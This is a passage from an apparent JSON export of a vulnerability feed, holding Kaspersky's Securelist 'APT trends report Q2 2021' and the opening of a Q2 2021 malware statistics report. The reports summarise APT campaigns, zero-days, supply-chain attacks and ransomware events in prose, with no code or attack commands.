"securelist", "title": "IT threat evolution Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0802", "CVE-2019-11510", "CVE-2021-1732", "CVE-2021-27065", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-08-12T10:00:37", "id": "SECURELIST:934E8AA177A27150B87EC15F920BF350", "href": "https://securelist.com/it-threat-evolution-q2-2021/103597/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-04T10:41:58", "description": "\n\nFor more than four years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q2 2021.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nInvestigating the recent Microsoft Exchange vulnerabilities we and our colleagues from AMR found an attacker deploying a previously unknown backdoor, "FourteenHi", in a campaign that we dubbed ExCone, active since mid-March. During our investigation we revealed multiple tools and variants of FourteenHi, configured with infrastructure that FireEye reported as being related to the UNC2643 activity cluster. Moreover, we saw ShadowPad detections coincide with FourteenHi variant infections, possibly hinting at a shared operator between these two malware families.\n\nFourteenHi abuses the popular VLC media player to execute its loader. It is capable of performing basic backdoor functions. Further investigation also revealed scripts used by the actor to gain situational awareness post-exploitation, as well as previous use of the infrastructure to operate Cobalt Strike Beacon.\n\nAlthough we couldn't directly attribute this activity to any known threat actor, we found older, highly similar 64-bit samples of the backdoor used in close proximity with ShadowPad malware, mostly known for its operations involving supply-chain attacks as an infection vector. Notably, we also found one C2 IP used in a 64-bit sample reportedly used in the UNC2643 activity set, associated with the HAFNIUM threat actor, also using Cobalt Strike, DLL side-loading and exploiting the same Exchange vulnerabilities.\n\n## Russian-speaking activity\n\nOn May 27 and 28, details regarding an ongoing email campaign against diplomatic entities throughout Europe and North America were released by Volexity and Microsoft. These attacks were attributed to Nobelium and APT29 by Microsoft and Volexity respectively. While we were able to verify the malware and possible targeting for this cluster of activity, we haven't been able to make a definitive assessment at this time about which threat actor is responsible, although we found ties to Kazuar. We have designated it as a new threat actor and named it "HotCousin". The attacks began with a spear-phishing email which led to an ISO file container being stored on disk and mounted. From here, the victim was presented with a LNK file made to look like a folder within an Explorer window. If the victim double clicked on it, the LNK then executed a loader written in .NET referred to as BoomBox, or a DLL. The execution chain ultimately ended with a Cobalt Strike beacon payload being loaded into memory. According to public blogs, targeting was widespread but focused primarily on diplomatic entities throughout Europe and North America: based on the content of the lure documents bundled with the malware, this assessment appears to be accurate. This cluster of activity was conducted methodically beginning in January with selective targeting and slow operational pace, then ramping up and ending in May. There are indications of previous activity from this threat actor dating back to at least October 2020, based on other Cobalt Strike payloads and loaders bearing similar toolmarks.\n\n## Chinese-speaking activity\n\nWhile investigating a recent rise of attacks against Exchange servers, we noticed a recurring cluster of activity that appeared in several distinct compromised networks. This cluster stood out because it used a formerly unknown Windows kernel mode rootkit and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers. The former is used to hide the user mode malware's artefacts from investigators and security solutions, while demonstrating an interesting loading scheme involving the kernel mode component of an open source project named "Cheat Engine" to bypass the Windows Driver Signature Enforcement mechanism. We were able to determine that this toolset had been in use from as early as July 2020; and that the threat actor was mostly focused on Southeast Asian targets, including several governmental entities and telecoms companies. Since this was a long-standing operation, with high-profile victims, an advanced toolset and no affinity to a known threat actor, we decided to name the underlying cluster "GhostEmperor".\n\nAPT31 (aka ZIRCONIUM) is a Chinese-speaking intrusion set. This threat actor set up an ORB (Operational Relay Boxes) infrastructure, composed of several compromised SOHO routers, to target entities based in Europe (and perhaps elsewhere). As of the publication of our report in May, we had seen these ORBs used to relay Cobalt Strike communications and for anonymization proxying purposes. It is likely that APT31 uses them for other implants and ends as well (for example, exploit or malware staging). Most of the infrastructure put in place by APT31 comprises compromised Pakedge routers (RK1, RE1 and RE2). This little-known constructor specializes in small enterprise routers and network devices. So far, we don't know which specific vulnerability has been exploited by the intrusion set to compromise the routers. Nor do we currently possess telemetry that would provide further visibility into this campaign. We will, of course, continue to track these activities.\n\nFollowing our previous report on EdwardsPheasant, DomainTools and BitDefender published articles about malicious activities against targets in Southeast Asia which we believe, with medium to high confidence, are parts of EdwardsPheasant campaigns. While tracking the activities of this threat actor, analyzing samples discovered or provided by third parties, and investigating from public IoCs, we discovered an updated DropPhone implant, an additional implant loaded by FoundCore's shellcode, several possible new infection documents and malicious domain names, as well as additional targets. While we do not believe we have a complete picture of this set of activities yet, our report this quarter marks a significant step further in understanding its extent.\n\nA Chinese-speaking APT compromised a certificate authority in Mongolia and replaced digital certificate management client software with a malicious downloader in February. We are tracking this group as BountyGlad. Related infrastructure was identified and used in multiple other incidents: interesting related activity included server-side attacks on WebSphere and WebLogic services in Hong Kong; and on the client-side, Trojanized Flash Player installers. The group demonstrated an increase in strategic sophistication with this supply-chain attack. While replacing a legitimate installer on a high value website like a certificate authority requires a medium level of skill and coordination, the technical sophistication is not on par with ShadowHammer. And while the group deploys fairly interesting, but simplistic, steganography to cloak its shellcode, we think it was probably generated with code that has been publicly available for years. Previous activity also connected with this group relied heavily on spear-phishing and Cobalt Strike throughout 2020. Some activity involved PowerShell commands and loader variants different from the downloaders presented in our recent report. In addition to spear-phishing, the group appears to rely on publicly available exploits to penetrate unpatched target systems. They use implants and C2 (Command and Control) code that are a mix of both publicly available and privately shared across multiple Chinese-speaking APTs. We are able to connect infrastructure across multiple incidents. Some of those were focused on Western targets in 2020. Some of the infrastructure listed in an FBI Flash alert published in May 2020, targeting US organizations conducting COVID-19 research, was also used by BountyGlad.\n\nWhile investigating users infected with the TPCon backdoor, previously discussed in a private report, we detected loaders which are part of a new multi-plugin malware framework that we named "QSC", which allows attackers to load and run plugins in-memory. We attribute the use of this framework to Chinese-speaking groups, based on some overlaps in victimology and infrastructure with other known tools used by these groups. We have so far observed the malware loading a Command shell and File Manager plugins in-memory. We believe the framework has been used in the wild since April 2020, based on the compilation timestamp of the oldest sample found. However, our telemetry suggests that the framework is still in use: the latest activity we detected was in March this year.\n\nEarlier this month, Rostelecom Solar and NCIRCC issued a joint public report describing a series of attacks against networks of government entities in Russia. The report described a formerly unknown actor leveraging an infection chain that leads to the deployment of two implants - WebDav-O and Mail-O. Those, in conjunction with other post-exploitation activity, have led to network-wide infections in the targeted organizations that resulted in exfiltration of sensitive data. We were able to trace the WebDav-O implant's activity in our telemetry to at least 2018, indicating government affiliated targets based in Belarus. Based on our investigation, we were able to find additional variants of the malware and observe some of the commands executed by the attackers on the compromised machines.\n\nWe discovered a cluster of activity targeting telecom operators within a specific region. The bulk of this activity took place from May to October 2020. This activity made use of several malware families and tools; but the infrastructure, a staging directory, and in-country target profiles tie them together. The actors deployed a previously unknown passive backdoor, that we call "TPCon", as a primary implant. It was later used to perform both reconnaissance within target organizations and to deploy a post-compromise toolset made up mostly of publicly available tools. We also found other previously unknown active backdoors, that we call "evsroin", used as secondary implants. Another interesting find was a related loader (found in a staging directory) that loaded a KABA1 implant variant. KABA1 was an implant used against targets throughout the South China Sea that we attributed to the Naikon APT back in 2016. On another note, on the affected hosts we found additional multiple malware families shared by Chinese-speaking actors, such as ShadowPad and Quarian backdoors. These did not seem to be directly connected to the TPCon/evsroin incidents because the supporting infrastructure appeared to be completely separate. One of the ShadowPad samples appears to have been detected in 2020, while the others were detected well before that, in 2019. Besides the Naikon tie, we found some overlaps with previously reported IceFog and IamTheKing activities.\n\n## Middle East\n\nBlackShadow is a threat group that became known after exfiltrating sensitive documents from Shirbit, an Israeli insurance company, and demanding a ransom in exchange for not releasing the information in its possession. Since then, the group has made more headlines, breaching another company in Israel and publishing a trove of documents containing customer related information on Telegram. Following this, we found several samples of the group's unique .NET backdoor in our telemetry that were formerly unknown to us, one of which was recently detected in Saudi Arabia. By pivoting on new infrastructure indicators that we observed in those samples, we were able to find a particular C2 server that was contacted by a malicious Android implant and shows ties to the group's activity.\n\nWe previously covered a WildPressure campaign against targets in the Middle East . Keeping track of the threat actor's malware this spring, we were able to find a newer version (1.6.1) of their C++ Trojan, a corresponding VBScript variant with the same version and a completely new set of modules, including an orchestrator and three plugins. This confirms our previous assumption that there are more last-stagers besides the C++ ones, based on one of the fields in the C2 communication protocol which contains the "client" programming language. Another language used by WildPressure is Python. The PyInstaller module for Windows contains a script named "Guard". Perhaps the most interesting finding here is that this malware was developed for both Windows and macOS operating systems. In this case, the hardcoded version is 2.2.1. The coding style, overall design and C2 communication protocol is quite recognisable across all programming languages used by the attackers. The malware used by WildPressure is still under active development in terms of versions and programming languages in use. Although we could not associate WildPressure's activity with other threat actors, we did find minor similarities in the TTPs (Tactics, Techniques and Procedures) used by BlackShadow, which is also active in the same region. However, we consider that these similarities serve as minor ties and are not enough to make any attribution.\n\nWe discovered an ongoing campaign that we attribute to an actor named WIRTE, beginning in late 2019, targeting multiple sectors, focused on the Middle East. WIRTE is a lesser-known threat actor first publicly referenced in 2019, which we suspect has relations with the Gaza Cybergang threat actor group. During our hunting efforts, in February, for threat actor groups that are using VBS/VBA implants, we came across MS Excel droppers that use hidden spreadsheets and VBA macros to drop their first stage implant - a VBS script. The VBS script's main function is to collect system information and execute arbitrary code sent by the attackers. Although we recently reported on a new Muddywater first stage VBS implant used for reconnaissance and profiling activities, these intrusion sets have slightly different TTPs and wider targeting. To date, we have recorded victims focused in the Middle East and a few other countries outside this region. Despite various industries being affected, the focus was mainly towards government and diplomatic entities; however, we also noticed an unusual targeting of law firms.\n\nGoldenJackal is the name we have given to a cluster of activity, recently discovered in our telemetry, that has been active since November 2019. This intrusion set consists of a set of .NET-based implants that are intended to control victim machines and exfiltrate certain files from them, suggesting that the actor's primary motivation is espionage. Furthermore, the implants were found in a restricted set of machines associated with diplomatic entities in the Middle East. Analysis of the aforementioned malware, as well as the accompanied detection logs, portray a capable and moderately stealthy actor. This can be substantiated by the successful foothold gained by the underlying actor in the few organizations we came across, all the while keeping a low signature and ambiguous footprint.\n\n## Southeast Asia and Korean Peninsula\n\nThe ScarCruft group is a geo-political motivated APT group that usually attacks government entities, diplomats and individuals associated with North Korean affairs. Following our last report about this group, we had not seen its activities for almost a year. However, we observed that ScarCruft compromised a North Korea-related news media website in January, beginning a campaign that was active until March. The attackers utilized the same exploit chains, CVE-2020-1380 and CVE-2020-0986, also used in [Operation Powerfall](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>). Based on the exploit code and infection scheme characteristics, we suspect that Operation PowerFall has a connection with the ScarCruft group. The exploit chain contains several stages of shellcode execution, finally deploying a Windows executable payload in memory. We discovered several victims from South Korea and Singapore. Besides this watering-hole attack, this group also used Windows executable malware concealing its payload. This malware, dubbed "ATTACK-SYSTEM", also used multi-stage shellcode infection to deliver the same final payload named "BlueLight". BlueLight uses OneDrive for C2. Historically, ScarCruft malware, especially RokRat, took advantage of personal cloud servers as C2 servers, such as pCloud, Box, Dropbox, and Yandex.\n\nIn May 2020, the Criminal Investigation Bureau (CIB) of Taiwan published an announcement about an attack targeting Taiwanese legislators. Based on their information, an unknown attacker sent spear-phishing emails using a fake presidential palace email account, delivering malware we dubbed "Palwan". Palwan is malware capable of performing basic backdoor functionality as well as downloading further modules with additional capabilities. Analysing the malware, we discovered another campaign, active in parallel, targeting Nepal. We also found two more waves of attacks launched against Nepal in October 2020 and in January this year using Palwan malware variants. We suspect that the targeted sector in Nepal is similar to the one reported by the CIB of Taiwan. Investigating the infrastructure used in the Nepal campaigns, we spotted an overlap with Dropping Elephant activity. However, we don't deem this overlap sufficient to attribute this activity to the Dropping Elephant threat actor.\n\nBlueNoroff is a long-standing, financially motivated APT group that has been targeting the financial industry for years. In recent operations, the group has focused on cryptocurrency businesses. Since the publication of our research of BlueNoroff's "SnatchCrypto" campaign in 2020, the group's strategy to deliver malware has evolved. In this campaign, BlueNoroff used a malicious Word document exploiting CVE-2017-0199, a remote template injection vulnerability. The injected template contains a Visual Basic script, which is responsible for decoding the next payload from the initial Word document and injecting it into a legitimate process. The injected payload creates a persistent backdoor on the victim's machine. We observed several types of backdoor. For further surveillance of the victim, the malware operator may also deploy additional tools. BlueNoroff has notably set up fake blockchain, or cryptocurrency-related, company websites for this campaign, to lure potential victims and initiate the infection process. Numerous decoy documents were used, which contain business and nondisclosure agreements as well as business introductions. When compared to the previous SnatchCrypto campaign, the BlueNoroff group utilized a similar backdoor and PowerShell agent but changed the initial infection vector. Windows shortcut files attached to spear-phishing emails used to be the starting point for an infection: they have now been replaced by weaponized Word documents.\n\nWe have discovered [Andariel activity](<https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/>) using a revised infection scheme and custom ransomware targeting a broad spectrum of industries located in South Korea. In April, we observed a suspicious document containing a Korean file name and decoy uploaded to VirusTotal. It revealed a novel infection scheme and an unfamiliar payload. During the course of our research, Malwarebytes published a report with technical details about the same series of attacks, which attributed it to the Lazarus group. After a deep analysis we reached a different conclusion - that the Andariel group was behind these attacks. Code overlaps between the second stage payload in this campaign and previous malware from the Andariel group allowed for this attribution. Apart from the code similarity and the victimology, we found additional connections with the Andariel group. Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity. The threat actor has been spreading the third stage payload since the middle of 2020 and leveraged malicious Word documents and files mimicking PDF documents as infection vectors. Notably, in addition to the final backdoor, we discovered one victim infected with custom ransomware. This ransomware adds another facet to this Andariel campaign, which also sought financial profit in a previous operation involving the compromise of ATMs.\n\nWe recently uncovered a large-scale and highly active attack in Southeast Asia coming from a threat actor we dubbed [LuminousMoth](<https://securelist.com/apt-luminousmoth/103332/>). Further analysis revealed that this malicious activity dates back to October 2020 and was still ongoing at the time we reported it in June. LuminousMoth takes advantage of DLL sideloading to download and execute a Cobalt Strike payload. However, perhaps the most interesting part of this attack is its capability to spread to other hosts by infecting USB drives. In addition to the malicious DLLs, the attackers also deployed a signed, but fake version of the popular application Zoom on some infected systems, enabling them to exfiltrate files; and an additional tool that accesses a victim's Gmail session by stealing cookies from the Chrome browser. Infrastructure ties as well as shared TTPs allude to a possible connection between LuminousMoth and the HoneyMyte threat group, which was seen targeting the same region and using similar tools in the past. Most early sightings of this activity were in Myanmar, but it now appears that the attackers are much more active in the Philippines, where the number of known attacks has grown more than tenfold. This raises the question of whether this is caused by a rapid replication through removable devices or by an unknown infection vector, such as a watering-hole focusing on the Philippines.\n\nWe recently reported SideCopy campaigns attacking the Windows platform together with Android-based implants. These implants turned out to be multiple applications working as information stealers to collect sensitive information from victims' devices, such as contact lists, SMS messages, call recordings, media and other types of data. Following up, we discovered additional malicious Android applications, some of them purporting to be known messaging apps like Signal or an adult chat platform. These newly discovered applications use the Firebase messaging service as a channel to receive commands. The operator is able to control if either Dropbox or another, hard coded server is used to exfiltrate stolen files.\n\n## Other interesting discoveries\n\nExpanding our research on the exploit targeting CVE-2021-1732, originally discovered by DBAPPSecurity Threat Intelligence Center and used by the Bitter APT group, [we discovered another possible zero-day exploit used in the Asia-Pacific (APAC) region](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>). Interestingly, the exploit was found in the wild as part of a separate framework, alongside CVE-2021-1732 as well as other previously patched exploits. We are highly confident that this framework is entirely unrelated to Bitter APT and was used by a different threat actor. Further analysis revealed that this Escalation of Privilege (EoP) exploit has potentially been used in the wild since at least November 2020. Upon discovery, we reported this new exploit to Microsoft in February. After confirmation that we were indeed dealing with a new zero-day, it received the designation CVE-2021-28310.\n\nVarious marks and artifacts left in the exploit mean that we are also highly confident that CVE-2021-1732 and CVE-2021-28310 were created by the same exploit developer that we track as "Moses". "Moses" appears to be an exploit developer who makes exploits available to several threat actors, based on other past exploits and the actors observed using them. To date, we have confirmed that at least two known threat actors have utilized exploits originally developed by Moses: Bitter APT and Dark Hotel. Based on similar marks and artifacts, as well as privately obtained information from third parties, we believe at least six vulnerabilities observed in the wild in the last two years have originated from "Moses". While the EoP exploit was discovered in the wild, we are currently unable to directly tie its usage to any known threat actor that we are currently tracking. The EoP exploit was probably chained together with other browser exploits to escape sandboxes and obtain system level privileges for further access. Unfortunately, we weren't able to capture a full exploit chain, so we don't know if the exploit is used with another browser zero-day, or coupled with exploits taking advantage of known, patched vulnerabilities.\n\nIn another, more recent investigation into the surge of attacks by APT actors against Exchange servers following the revelation of ProxyLogon and other Exchange vulnerabilities, we took note of one unique cluster of activity. It attracted our attention because the actor behind it seemed to have been active in compromising Exchange servers since at least December 2020, all the while using a toolset that we were not able to associate with any known threat group. During March, several waves of attacks on Exchange servers were made public, partially describing the same cluster of activity that we had observed. One of them, reported by ESET, contained an assessment that the actor behind this activity had access to the Exchange exploits prior to their public release, which aligns with our observations of the early activity of it last year. That said, none of the public accounts described sightings of the full infection chain and later stages of malware deployed as part of this group's operation. Adopting the name Websiic, given publicly to this cluster of activity by ESET, we reported the TTPs of the underlying threat actor. Namely, we focused on the usage of both commodity tools like the China Chopper webshell and a proprietary .NET backdoor used by the group, which we dubbed "Samurai", as well as describing a broader set of targets than the one documented thus far.\n\nOn 15 April, Codecov publicly disclosed that its Bash Uploader script had been compromised and was distributed to users between the 31 January and the 1 April. The Bash Uploader script is publicly distributed by Codecov and aims to gather information on the user's execution environments, collect code coverage reports, and send them to the Codecov infrastructure. As a result, this script compromise effectively constitutes a supply-chain attack. The Bash uploader script is typically executed as a trusted resource in development and testing environments (including as part of automated build processes, such as continuous integration or development pipelines); and its compromise could enable malicious access to infrastructure or account secrets, as well as code repositories and source code. While we haven't been able to confirm the malicious script deployment, retrieve any information on the compromise goals, or identify further associated malicious tools yet, we were able to collect one sample of a compromised Bash uploader script, as well as identify some possibly associated additional malicious servers.\n\nAn e-mail sent by Click Studios to its customers on 22 April informed them that a sophisticated threat actor had gained access to the Passwordstate automatic updating functionality, referred to as the in-place upgrade. Passwordstate is a password management tool for enterprises, and on 20 April, for a period of about 28 hours, a malicious DLL was included in the software updates. On 24 April, an incident management advisory was also released. The purpose of the campaign was to steal passwords stored in the password manager. Although this attack was only active for a short time, we managed to obtain the malicious DLLs and reported our initial findings. Nevertheless, it's still unclear how the attackers gained access to the Passwordstate software to begin with. Following a new advisory published by Click Studio on 28 April, we discovered a new variant of the malicious DLL used to backdoor the Passwordstate password manager. This DLL variant was distributed in a phishing campaign, most likely by the same actor.\n\nA few days after April's Patch Tuesday updates from Microsoft (13 April), a number of suspicious files caught our attention. These files were binaries, disguised as "April 2021 Security Update Installers". They were signed with a valid digital signature, delivering Cobalt Strike beacon modules. It is likely that the modules were signed with a stolen digital certificate. These Cobalt Strike beacon implants were configured with a hardcoded C2, "code.microsoft.com". Contrary to a (now redacted) publication from the Qihoo 360 team revolving around this activity, we can confirm that there was no compromise of Microsoft's infrastructure. In fact, an unauthorized party took over the dangling subdomain "code.microsoft.com" and configured it to resolve to their Cobalt Strike host, setup around 15 April. That domain hosted a Cobalt Strike beacon payload served to HTTP clients using a specific and unique user agent. According to Microsoft and the initial Qihoo notification, the impact in this case was very limited and didn't affect unsuspecting visitors to this website because of the required unique user agent.\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web-browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. The EoP exploit was fine-tuned to work against the latest and the most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2) and it exploits two distinct vulnerabilities in the Microsoft Windows OS kernel. On April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as a part of the June Patch Tuesday. The exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a "remote shell"-style backdoor which in turns connects to the C2 to get commands. So far, we haven't been able to find any connections or overlaps with a known actor. Therefore, we are tentatively calling this cluster of activity [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\nOn April 16, we began hearing rumors about active exploitation of Pulse Secure devices from other researchers in the community. One day prior to this, the NSA, CISA, and FBI had jointly published an advisory stating that APT29 was conducting widespread scanning and exploitation of vulnerable systems, including Pulse Secure. For this reason, initial thoughts were that the two were related; and these were just rumors circulating the community about old activity that was being brought to light again. Following this, we were able to at least confirm that the initial rumors were part of a separate set of activities that had occurred between January and March and were not directly related to the advisory mentioned above. This new activity involved the exploitation of at least two vulnerabilities in Pulse Secure; one previously patched and one zero-day (CVE-2021-22893). We also became aware of affected organizations that were notified by a third party that they were potentially compromised by this activity. After exploitation, the threat actor proceeded to deploy a simple webshell to maintain persistence. On May 3, Pulse Secure delivered "out-of-cycle" update and workaround packages to provide a solution for the multiple vulnerabilities.\n\nCooperating with Check Point Research, we discovered an ongoing attack targeting a small group of individuals in Xinjiang and Pakistan, in regions mostly populated by the Uyghur minority. The attackers used malicious executables that collect information about the infected system and attempt to download a second-stage payload. The actor put considerable effort into disguising the payloads, whether by creating delivery documents that appear to be originating from the United Nations using up-to-date related themes, or by setting up websites for non-existing organizations claiming to fund charity groups. In our report, we examined the flow of both infection vectors and provided our analysis of the malicious artifacts we came across during this investigation, even though we were unable to obtain the later stages of the infection chain.\n\n## Final thoughts\n\nWhile the TTPs of some threat actors remain consistent over time, relying heavily on social engineering as a means of gaining a foothold in a target organisation or compromising an individual's device, others refresh their toolsets and extend the scope of their activities. Our regular quarterly reviews are intended to highlight the key developments of APT groups.\n\nHere are the main trends that we've seen in Q2 2021:\n\n * We have reported several supply-chain attacks in recent months.. While some were major and have attracted worldwide attention, we observed equally successful low-tech attacks, such as BountyGlad, CoughingDown and the attack targeting Codecov.\n * APT groups mainly use social engineering to gain an initial foothold in a target network. However, we've seen a rise in APT threat actors leveraging exploits to gain that initial foothold - including the zero-days developed by the exploit developer we call "Moses" and those used in the PuzzleMaker, Pulse Secure attacks and the Exchange server vulnerabilities.\n * APT threat actors typically refresh and update their toolsets: this includes not only the inclusion of new platforms but also the use of additional languages as seen by WildPressure's macOS-supported Python malware.\n * As illustrated by the campaigns of various threat actors - including BountyGlad, HotCousin, GoldenJackal, Scarcruft, Palwan, Pulse Secure and the threat actor behind the WebDav-O/Mail-O implants - geo-politics continues to drive APT developments.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T10:00:46", "type": "securelist", "title": "APT trends report Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2020-0986", "CVE-2020-1380", "CVE-2021-1732", "CVE-2021-22893", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-07-29T10:00:46", "id": "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "href": "https://securelist.com/apt-trends-report-q2-2021/103517/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-12T10:37:29", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q2 2021:\n\n * Kaspersky solutions blocked 1,686,025,551 attacks from online resources across the globe.\n * Web antivirus recognized 675,832,360 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 119,252 unique users.\n * Ransomware attacks were defeated on the computers of 97,451 unique users.\n * Our file antivirus detected 68,294,298 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2021, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 119,252 unique users.\n\n_Number of unique users attacked by financial malware, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11140610/01-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Geography of financial malware attacks**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._\n\n_Geography of financial malware attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11140636/02-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 5.8 \n2 | Tajikistan | 5.0 \n3 | Afghanistan | 4.2 \n4 | Uzbekistan | 3.3 \n5 | Lithuania | 2.9 \n6 | Sudan | 2.8 \n7 | Paraguay | 2.5 \n8 | Zimbabwe | 1.6 \n9 | Costa Rica | 1.5 \n10 | Yemen | 1.5 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\nLast quarter, as per tradition, the most widespread family of bankers was ZeuS/Zbot (17.8%), but its share in Q2 almost halved, by 13 p.p. Second place again went to the CliptoShuffler family (9.9%), whose share also fell, by 6 p.p. The Top 3 is rounded out by SpyEye (8.8%), which added 5 p.p., climbing from the eighth place. Note the disappearance of Emotet from the Top 10, which was predictable given the liquidation of its infrastructure in the previous quarter.\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 17.8 \n2 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 9.9 \n3 | SpyEye | Trojan-Spy.Win32.SpyEye | 8.8 \n4 | Trickster | Trojan.Win32.Trickster | 5.5 \n5 | RTM | Trojan-Banker.Win32.RTM | 3.8 \n6 | Danabot | Trojan-Banker.Win32.Danabot | 3.6 \n7 | Nimnul | Virus.Win32.Nimnul | 3.3 \n8 | Cridex | Backdoor.Win32.Cridex | 2.3 \n9 | Nymaim | Trojan.Win32.Nymaim | 1.9 \n10 | Neurevt | Trojan.Win32.Neurevt | 1.6 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n#### Attack on Colonial Pipeline and closure of DarkSide\n\nRansomware attacks on large organizations continued in Q2. Perhaps the most notable event of the quarter was the [attack by the DarkSide group on Colonial Pipeline](<https://ics-cert.kaspersky.com/reports/2021/05/21/darkchronicles-the-consequences-of-the-colonial-pipeline-attack/>), one of the largest fuel pipeline operators in the US. The incident led to fuel outages and a state of emergency in four states. The results of the investigation, which involved the FBI and several other US government agencies, was reported to US President Joe Biden.\n\nFor the cybercriminals, this sudden notoriety proved unwelcome. In their blog, DarkSide's creators heaped the blame on third-party operators. Another post was published stating that DarkSide's developers had lost access to part of their infrastructure and were shutting down the service and the affiliate program.\n\nAnother consequence of this high-profile incident was a new rule on the Russian-language forum XSS, where many developers of ransomware, including REvil (also known as Sodinokibi or Sodin), LockBit and Netwalker, advertise their affiliate programs. The new rule forbade the advertising and selling of any ransomware programs on the site. The administrators of other forums popular with cybercriminals took similar decisions.\n\n#### Closure of Avaddon\n\nAnother family of targeted ransomware whose owners shut up shop in Q2 is Avaddon. At the same time as announcing the shutdown, the attackers [provided](<https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/>) Bleeping Computer with the decryption keys.\n\n#### Clash with Clop\n\nUkrainian police [searched](<https://cyberpolice.gov.ua/news/kiberpolicziya-vykryla-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shyfruvalnyka-ta-nanesenni-inozemnym-kompaniyam-piv-milyarda-dolariv-zbytkiv-2402/>) and arrested members of the Clop group. Law enforcement agencies also deactivated part of the cybercriminals' infrastructure, which [did not](<https://www.bleepingcomputer.com/news/security/clop-ransomware-is-back-in-business-after-recent-arrests/>), however, stop the group's activities.\n\n#### Attacks on NAS devices\n\nIn Q2, cybercriminals stepped up their attacks on network-attached storage 